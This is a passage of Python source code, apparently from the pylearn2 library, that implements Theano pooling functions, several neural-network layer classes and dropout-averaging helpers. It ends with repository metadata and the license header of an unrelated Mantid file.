pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
if (required_r > r) or (required_c > c):
small_r = min(required_r, r)
small_c = min(required_c, c)
assert bc01.dtype.startswith('float')
wide_infinity = T.alloc(T.constant(-np.inf, dtype=bc01.dtype),
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
bc01 = T.set_subtensor(wide_infinity[:, :, 0:small_r, 0:small_c],
bc01[:, :, 0:small_r, 0:small_c])
name = 'infinite_padded_' + name
if use_dnn:
mx = pool_dnn(bc01, pool_shape, pool_stride, 'max')
else:
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('max_pool_cur_' + name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + name + '_' +
str(row_within_pool) + '_' +
str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
def max_pool_c01b(c01b, pool_shape, pool_stride, image_shape):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
c01b : theano tensor
minibatch in format (channels, rows, cols, batch size)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `c01b`
See Also
--------
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality but GPU-only
and considerably faster.
max_pool : Same functionality but with ('b', 0, 1, 'c') axes
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr > 0
assert pc > 0
assert pr <= r
assert pc <= c
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for c01bv in get_debug_values(c01b):
assert not contains_inf(c01bv)
assert c01bv.shape[1] == r
assert c01bv.shape[2] == c
wide_infinity = T.alloc(-np.inf,
c01b.shape[0],
required_r,
required_c,
c01b.shape[3])
name = c01b.name
if name is None:
name = 'anon_bc01'
c01b = T.set_subtensor(wide_infinity[:, 0:r, 0:c, :], c01b)
c01b.name = 'infinite_padded_' + name
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = c01b[:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs,
:]
cur.name = ('max_pool_cur_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
def mean_pool(bc01, pool_shape, pool_stride, image_shape):
"""
Does mean pooling (aka average pooling) via a Theano graph.
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
(rows, cols) tuple to avoid doing some arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool : Same thing but with max pooling
Examples
--------
>>> import theano
>>> import theano.tensor as T
>>> from pylearn2.models.mlp import mean_pool
>>> import numpy as np
>>> t = np.array([[1, 1, 3, 3],
... [1, 1, 3, 3],
... [5, 5, 7, 7],
... [5, 5, 7, 7],
... [9, 9, 11, 11],
... [9, 9, 11, 11]])
>>> X = np.zeros((3, t.shape[0], t.shape[1]))
>>> X[:] = t
>>> X = X[np.newaxis]
>>> X_sym = T.tensor4('X')
>>> pool_it = mean_pool(X_sym, pool_shape=(2, 2), pool_stride=(2, 2),
... image_shape=(6, 4))
>>> f = theano.function(inputs=[X_sym], outputs=pool_it)
This will pool over over windows of size (2, 2) while also stepping by this
same amount, shrinking the examples input to [[1, 3], [5, 7], [9, 11]].
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
wide_infinity = T.alloc(-np.inf,
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
name = bc01.name
if name is None:
name = 'anon_bc01'
bc01 = T.set_subtensor(wide_infinity[:, :, 0:r, 0:c], bc01)
bc01.name = 'infinite_padded_' + name
# Create a 'mask' used to keep count of the number of elements summed for
# each position
wide_infinity_count = T.alloc(0, bc01.shape[0], bc01.shape[1], required_r,
required_c)
bc01_count = T.set_subtensor(wide_infinity_count[:, :, 0:r, 0:c], 1)
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('mean_pool_cur_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
cur_count = bc01_count[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
if mx is None:
mx = cur
count = cur_count
else:
mx = mx + cur
count = count + cur_count
mx.name = ('mean_pool_mx_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx /= count
mx.name = 'mean_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
@wraps(_WD)
def WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _WD(*args, **kwargs)
@wraps(_L1WD)
def L1WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.L1WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _L1WD(*args, **kwargs)
class LinearGaussian(Linear):
"""
A Linear layer augmented with a precision vector, for modeling
conditionally Gaussian data.
Specifically, given an input x, this layer models the distrbution over
the output as
y ~ p(y | x) = N(y | Wx + b, beta^-1)
i.e., y is conditionally Gaussian with mean Wx + b and variance
beta^-1.
beta is a diagonal precision matrix so beta^-1 is a diagonal covariance
matrix.
Internally, beta is stored as the vector of diagonal values on this
matrix.
Since the output covariance is not a function of the input, this does
not provide an example-specific estimate of the error in the mean.
However, the vector-valued beta does mean that maximizing log p(y | x)
will reweight the mean squared error so that variables that can be
estimated easier will receive a higher penalty. This is one way of
adapting the model better to heterogenous data.
Parameters
----------
init_beta : float or ndarray
Any value > 0 that can be broadcasted to a vector of shape (dim, ).
The elements of beta are initialized to this value.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
min_beta : float
The elements of beta are constrained to be >= this value.
This value must be > 0., otherwise the output conditional is not
constrained to be a valid probability distribution.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
A trained model should always be able to obtain at least this much
precision, at least on the training set.
max_beta : float
The elements of beta are constrained to be <= this value.
We impose this constraint because for problems
where the training set values can be predicted
exactly, beta can grow without bound, which also makes the
gradients grow without bound, resulting in numerical problems.
kwargs : dict
Arguments to the `Linear` superclass.
"""
def __init__(self, init_beta, min_beta, max_beta, beta_lr_scale, **kwargs):
super(LinearGaussian, self).__init__(**kwargs)
self.__dict__.update(locals())
del self.self
del self.kwargs
@wraps(Layer.set_input_space)
def set_input_space(self, space):
super(LinearGaussian, self).set_input_space(space)
assert isinstance(self.output_space, VectorSpace)
self.beta = sharedX(self.output_space.get_origin() + self.init_beta,
'beta')
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(LinearGaussian,
self).get_layer_monitoring_channels(state_below,
state,
targets)
assert isinstance(rval, OrderedDict)
rval['beta_min'] = self.beta.min()
rval['beta_mean'] = self.beta.mean()
rval['beta_max'] = self.beta.max()
if targets:
rval['mse'] = T.sqr(state - targets).mean()
return rval
@wraps(Linear.cost)
def cost(self, Y, Y_hat):
return (0.5 * T.dot(T.sqr(Y - Y_hat), self.beta).mean() -
0.5 * T.log(self.beta).sum())
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
super(LinearGaussian, self)._modify_updates(updates)
if self.beta in updates:
updates[self.beta] = T.clip(updates[self.beta],
self.min_beta,
self.max_beta)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = super(LinearGaussian, self).get_lr_scalers()
if self.beta_lr_scale is not None:
rval[self.beta] = self.beta_lr_scale
return rval
@wraps(Layer.get_params)
def get_params(self):
return super(LinearGaussian, self).get_params() + [self.beta]
def beta_from_design(design, min_var=1e-6, max_var=1e6):
"""
Returns the marginal precision of a design matrix.
Parameters
----------
design : ndarray
A numpy ndarray containing a design matrix
min_var : float
max_var : float
All variances are constrained to lie in the range [min_var, max_var]
to avoid numerical issues like infinite precision.
Returns
-------
beta : ndarray
A 1D vector containing the marginal precision of each variable in the
design matrix.
"""
return 1. / np.clip(design.var(axis=0), min_var, max_var)
def beta_from_targets(dataset, **kwargs):
"""
Returns the marginal precision of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
A DenseDesignMatrix with a targets field `y`
kwargs : dict
Extra arguments to `beta_from_design`
Returns
-------
beta : ndarray
A 1-D vector containing the marginal precision of the *targets* in
`dataset`.
"""
return beta_from_design(dataset.y, **kwargs)
def beta_from_features(dataset, **kwargs):
"""
Returns the marginal precision of the features in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
The dataset to compute the precision on.
kwargs : dict
Passed through to `beta_from_design`
Returns
-------
beta : ndarray
Vector of precision values for each feature in `dataset`
"""
return beta_from_design(dataset.X, **kwargs)
def mean_of_targets(dataset):
"""
Returns the mean of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
Returns
-------
mn : ndarray
A 1-D vector with entry i giving the mean of target i
"""
return dataset.y.mean(axis=0)
class PretrainedLayer(Layer):
"""
A layer whose weights are initialized, and optionally fixed,
based on prior training.
Parameters
----------
layer_content : Model
Should implement "upward_pass" (RBM and Autoencoder do this)
freeze_params: bool
If True, regard layer_conent's parameters as fixed
If False, they become parameters of this layer and can be
fine-tuned to optimize the MLP's cost function.
"""
def __init__(self, layer_name, layer_content, freeze_params=False):
super(PretrainedLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@wraps(Layer.set_input_space)
def set_input_space(self, space):
assert self.get_input_space() == space
@wraps(Layer.get_params)
def get_params(self):
if self.freeze_params:
return []
return self.layer_content.get_params()
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.layer_content.get_input_space()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layer_content.get_output_space()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
return OrderedDict([])
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.layer_content.upward_pass(state_below)
class CompositeLayer(Layer):
"""
A Layer that runs several layers in parallel. Its default behavior
is to pass the layer's input to each of the components.
Alternatively, it can take a CompositeSpace as an input and a mapping
from inputs to layers i.e. providing each component layer with a
subset of the inputs.
Parameters
----------
layer_name : str
The name of this layer
layers : tuple or list
The component layers to run in parallel.
inputs_to_layers : dict mapping int to list of ints, optional
Can only be used if the input space is a CompositeSpace.
If inputs_to_layers[i] contains j, it means input i will
be given as input to component j. Note that if multiple inputs are
passed on to e.g. an inner CompositeLayer, the same order will
be maintained. If the list is empty, the input will be discarded.
If an input does not appear in the dictionary, it will be given to
all components.
Examples
--------
>>> composite_layer = CompositeLayer(
... layer_name='composite_layer',
... layers=[Tanh(7, 'h0', 0.1), Sigmoid(5, 'h1', 0.1)],
... inputs_to_layers={
... 0: [1],
... 1: [0]
... })
This CompositeLayer has a CompositeSpace with 2 subspaces as its
input space. The first input is given to the Sigmoid layer, the second
input is given to the Tanh layer.
>>> wrapper_layer = CompositeLayer(
... layer_name='wrapper_layer',
... layers=[Linear(9, 'h2', 0.1),
... composite_layer,
... Tanh(7, 'h3', 0.1)],
... inputs_to_layers={
... 0: [1],
... 2: []
... })
This CompositeLayer takes 3 inputs. The first one is given to the
inner CompositeLayer. The second input is passed on to each component
layer i.e. to the Tanh, Linear as well as CompositeLayer. The third
input is discarded. Note that the inner CompositeLayer wil receive
the inputs with the same ordering i.e. [0, 1], and never [1, 0].
"""
def __init__(self, layer_name, layers, inputs_to_layers=None):
self.num_layers = len(layers)
if inputs_to_layers is not None:
if not isinstance(inputs_to_layers, dict):
raise TypeError("CompositeLayer expected inputs_to_layers to "
"be dict, got " + str(type(inputs_to_layers)))
self.inputs_to_layers = OrderedDict()
for key in sorted(inputs_to_layers):
assert isinstance(key, py_integer_types)
value = inputs_to_layers[key]
assert is_iterable(value)
assert all(isinstance(v, py_integer_types) for v in value)
# Check 'not value' to support case of empty list
assert not value or all(0 <= v < self.num_layers
for v in value)
self.inputs_to_layers[key] = sorted(value)
super(CompositeLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@property
def routing_needed(self):
return self.inputs_to_layers is not None
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if not isinstance(space, CompositeSpace):
if self.inputs_to_layers is not None:
raise ValueError("CompositeLayer received an inputs_to_layers "
"mapping, but does not have a CompositeSpace "
"as its input space, so there is nothing to "
"map. Received " + str(space) + " as input "
"space.")
elif self.routing_needed:
if not max(self.inputs_to_layers) < len(space.components):
raise ValueError("The inputs_to_layers mapping of "
"CompositeSpace contains they key " +
str(max(self.inputs_to_layers)) + " "
"(0-based) but the input space only "
"contains " + str(self.num_layers) + " "
"layers.")
# Invert the dictionary
self.layers_to_inputs = OrderedDict()
for i in xrange(self.num_layers):
inputs = []
for j in xrange(len(space.components)):
if j in self.inputs_to_layers:
if i in self.inputs_to_layers[j]:
inputs.append(j)
else:
inputs.append(j)
self.layers_to_inputs[i] = inputs
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_space = space.restrict(self.layers_to_inputs[i])
else:
cur_space = space
layer.set_input_space(cur_space)
self.input_space = space
self.output_space = CompositeSpace(tuple(layer.get_output_space()
for layer in self.layers))
self._target_space = CompositeSpace(tuple(layer.get_target_space()
for layer in self.layers))
@wraps(Layer.get_params)
def get_params(self):
rval = []
for layer in self.layers:
rval = safe_union(layer.get_params(), rval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
rvals = []
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
rvals.append(layer.fprop(cur_state_below))
return tuple(rvals)
def _weight_decay_aggregate(self, method_name, coeff):
if isinstance(coeff, py_float_types):
return T.sum([getattr(layer, method_name)(coeff)
for layer in self.layers])
elif is_iterable(coeff):
assert all(layer_coeff >= 0 for layer_coeff in coeff)
return T.sum([getattr(layer, method_name)(layer_coeff) for
layer, layer_coeff in safe_zip(self.layers, coeff)
if layer_coeff > 0], dtype=config.floatX)
else:
raise TypeError("CompositeLayer's " + method_name + " received "
"coefficients of type " + str(type(coeff)) + " "
"but must be provided with a float or list/tuple")
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights,
which is the weighted sum of the squared L2 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the squared L2 weight decay penalty for
this layer. If a single value is provided, this coefficient is
used for each component layer. If a list of tuple of
coefficients is given they are passed on to the component
layers in the given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the squared L2 weight decay penalty term for
this layer.
"""
return self._weight_decay_aggregate('get_weight_decay', coeff)
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for a squared L1 penalty on the weights,
which is the weighted sum of the squared L1 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the L1 weight decay penalty for this layer.
If a single value is provided, this coefficient is used for
each component layer. If a list of tuple of coefficients is
given they are passed on to the component layers in the
given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
return self._weight_decay_aggregate('get_l1_weight_decay', coeff)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return sum(layer.cost(Y_elem, Y_hat_elem)
for layer, Y_elem, Y_hat_elem in
safe_zip(self.layers, Y, Y_hat))
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(CompositeLayer, self).set_mlp(mlp)
for layer in self.layers:
layer.set_mlp(mlp)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
# TODO: reduce redundancy with fprop method
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
if state is not None:
cur_state = state[i]
else:
cur_state = None
if targets is not None:
cur_targets = targets[i]
else:
cur_targets = None
d = layer.get_layer_monitoring_channels(
cur_state_below, cur_state, cur_targets)
for key in d:
rval[layer.layer_name + '_' + key] = d[key]
return rval
@wraps(Model._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
class FlattenerLayer(Layer):
"""
A wrapper around a different layer that flattens
the original layer's output.
The cost works by unflattening the target and then
calling the wrapped Layer's cost.
This is mostly intended for use with CompositeLayer as the wrapped
Layer, and is mostly useful as a workaround for theano not having
a TupleVariable with which to represent a composite target.
There are obvious memory, performance, and readability issues with doing
this, so really it would be better for theano to support TupleTypes.
See pylearn2.sandbox.tuple_var and the theano-dev e-mail thread
"TupleType".
Parameters
----------
raw_layer : Layer
Layer that FlattenerLayer wraps.
"""
def __init__(self, raw_layer):
super(FlattenerLayer, self).__init__()
self.__dict__.update(locals())
del self.self
self.layer_name = raw_layer.layer_name
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.raw_layer.set_input_space(space)
total_dim = self.raw_layer.get_output_space().get_total_dimension()
self.output_space = VectorSpace(total_dim)
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.raw_layer.get_input_space()
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
return self.raw_layer.get_monitoring_channels(data)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
raw_space = self.raw_layer.get_output_space()
state = raw_space.undo_format_as(state,
self.get_output_space())
if targets is not None:
targets = self.get_target_space().format_as(
targets, self.raw_layer.get_target_space())
return self.raw_layer.get_layer_monitoring_channels(
state_below=state_below,
state=state,
targets=targets
)
@wraps(Layer.get_monitoring_data_specs)
def get_monitoring_data_specs(self):
return self.raw_layer.get_monitoring_data_specs()
@wraps(Layer.get_params)
def get_params(self):
return self.raw_layer.get_params()
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
return self.raw_layer.get_weight_decay(coeffs)
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
return self.raw_layer.get_l1_weight_decay(coeffs)
@wraps(Layer.set_batch_size)
def set_batch_size(self, batch_size):
self.raw_layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
self.raw_layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return self.raw_layer.get_lr_scalers()
@wraps(Layer.fprop)
def fprop(self, state_below):
raw = self.raw_layer.fprop(state_below)
return self.raw_layer.get_output_space().format_as(raw,
self.output_space)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
raw_space = self.raw_layer.get_output_space()
target_space = self.output_space
raw_Y = target_space.format_as(Y, raw_space)
raw_Y_hat = raw_space.undo_format_as(Y_hat, target_space)
raw_space.validate(raw_Y_hat)
return self.raw_layer.cost(raw_Y, raw_Y_hat)
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(FlattenerLayer, self).set_mlp(mlp)
self.raw_layer.set_mlp(mlp)
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
class WindowLayer(Layer):
"""
Layer used to select a window of an image input.
The input of the layer must be Conv2DSpace.
Parameters
----------
layer_name : str
A name for this layer.
window : tuple
A four-tuple of ints indicating respectively
the top left x and y position, and
the bottom right x and y position of the window.
"""
def __init__(self, layer_name, window):
super(WindowLayer, self).__init__()
self.__dict__.update(locals())
del self.self
if window[0] < 0 or window[0] > window[2] or \
window[1] < 0 or window[1] > window[3]:
raise ValueError("WindowLayer: bad window parameter")
@wraps(Layer.fprop)
def fprop(self, state_below):
extracts = [slice(None), slice(None), slice(None), slice(None)]
extracts[self.rows] = slice(self.window[0], self.window[2] + 1)
extracts[self.cols] = slice(self.window[1], self.window[3] + 1)
extracts = tuple(extracts)
return state_below[extracts]
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise TypeError("The input to a Window layer should be a "
"Conv2DSpace, but layer " + self.layer_name +
" got " + str(type(self.input_space)))
axes = space.axes
self.rows = axes.index(0)
self.cols = axes.index(1)
nrows = space.shape[0]
ncols = space.shape[1]
if self.window[2] + 1 > nrows or self.window[3] + 1 > ncols:
raise ValueError("WindowLayer: bad window shape. "
"Input is [" + str(nrows) + ", " +
str(ncols) + "], "
"but layer " + self.layer_name + " has window "
+ str(self.window))
self.output_space = Conv2DSpace(
shape=[self.window[2] - self.window[0] + 1,
self.window[3] - self.window[1] + 1],
num_channels=space.num_channels,
axes=axes)
@wraps(Layer.get_params)
def get_params(self):
return []
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self):
return []
def generate_dropout_mask(mlp, default_include_prob=0.5,
input_include_probs=None, rng=(2013, 5, 17)):
"""
Generate a dropout mask (as an integer) given inclusion
probabilities.
Parameters
----------
mlp : object
An MLP object.
default_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
in which `default_include_prob` is used for all
layers.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
Returns
-------
mask : int
An integer indexing a dropout mask for the network,
drawn with the appropriate probability given the
inclusion probabilities.
"""
if input_include_probs is None:
input_include_probs = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
total_units = 0
mask = 0
for layer in mlp.layers:
if layer.layer_name in input_include_probs:
p = input_include_probs[layer.layer_name]
else:
p = default_include_prob
for _ in xrange(layer.get_input_space().get_total_dimension()):
mask |= int(rng.uniform() < p) << total_units
total_units += 1
return mask
def sampled_dropout_average(mlp, inputs, num_masks,
default_input_include_prob=0.5,
input_include_probs=None,
default_input_scale=2.,
input_scales=None,
rng=(2013, 5, 17),
per_example=False):
"""
Take the geometric mean over a number of randomly sampled
dropout masks for an MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
num_masks : int
The number of masks to sample.
default_input_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
in which `default_include_prob` is used for all
layers.
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
per_example : bool, optional
If `True`, generate a different mask for every single
test example, so you have `num_masks` per example
instead of `num_mask` networks total. If `False`,
`num_masks` masks are fixed in the graph.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction of
all the networks.
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
mlp._validate_layer_names(list(input_include_probs.keys()))
mlp._validate_layer_names(list(input_scales.keys()))
if per_example:
outputs = [mlp.dropout_fprop(inputs, default_input_include_prob,
input_include_probs,
default_input_scale,
input_scales)
for _ in xrange(num_masks)]
else:
masks = [generate_dropout_mask(mlp, default_input_include_prob,
input_include_probs, rng)
for _ in xrange(num_masks)]
outputs = [mlp.masked_fprop(inputs, mask, None,
default_input_scale, input_scales)
for mask in masks]
return geometric_mean_prediction(outputs)
def exhaustive_dropout_average(mlp, inputs, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
masked_input_layers : list, optional
A list of layer names whose input should be masked.
Default is all layers (including the first hidden
layer, i.e. mask the input).
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
if masked_input_layers is None:
masked_input_layers = mlp.layer_names
mlp._validate_layer_names(masked_input_layers)
if input_scales is None:
input_scales = {}
mlp._validate_layer_names(input_scales.keys())
if any(key not in masked_input_layers for key in input_scales):
not_in = [key for key in input_scales
if key not in mlp.layer_names]
raise ValueError(", ".join(not_in) + " in input_scales"
" but not masked")
num_inputs = mlp.get_total_input_dimension(masked_input_layers)
outputs = [mlp.masked_fprop(inputs, mask, masked_input_layers,
default_input_scale, input_scales)
for mask in xrange(2 ** num_inputs)]
return geometric_mean_prediction(outputs)
def geometric_mean_prediction(forward_props):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
forward_props : list
A list of Theano graphs corresponding to forward
propagations through the network with different
dropout masks.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
presoftmax = []
for out in forward_props:
assert isinstance(out.owner.op, T.nnet.Softmax)
assert len(out.owner.inputs) == 1
presoftmax.append(out.owner.inputs[0])
average = reduce(operator.add, presoftmax) / float(len(presoftmax))
return T.nnet.softmax(average)
class BadInputSpaceError(TypeError):
"""
An error raised by an MLP layer when set_input_space is given an
object that is not one of the Spaces that layer supports.
"""
def get_lr_scalers_from_layers(owner):
"""
Get the learning rate scalers for all member layers of
`owner`.
Parameters
----------
owner : Model
Any Model with a `layers` field
Returns
-------
lr_scalers : OrderedDict
A dictionary mapping parameters of `owner` to learning
rate scalers.
"""
rval = OrderedDict()
params = owner.get_params()
for layer in owner.layers:
contrib = layer.get_lr_scalers()
assert isinstance(contrib, OrderedDict)
# No two layers can contend to scale a parameter
assert not any([key in rval for key in contrib])
# Don't try to scale anything that's not a parameter
assert all([key in params for key in contrib])
rval.update(contrib)
assert all([isinstance(val, float) for val in rval.values()])
return rval
|
bsd-3-clause
| -8,657,553,449,295,059,000
| 33.730232
| 79
| 0.554054
| false
| 4.164048
| false
| false
| false
|
mganeva/mantid
|
scripts/Muon/GUI/MuonAnalysis/load_widget/load_widget_model.py
|
1
|
1513
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
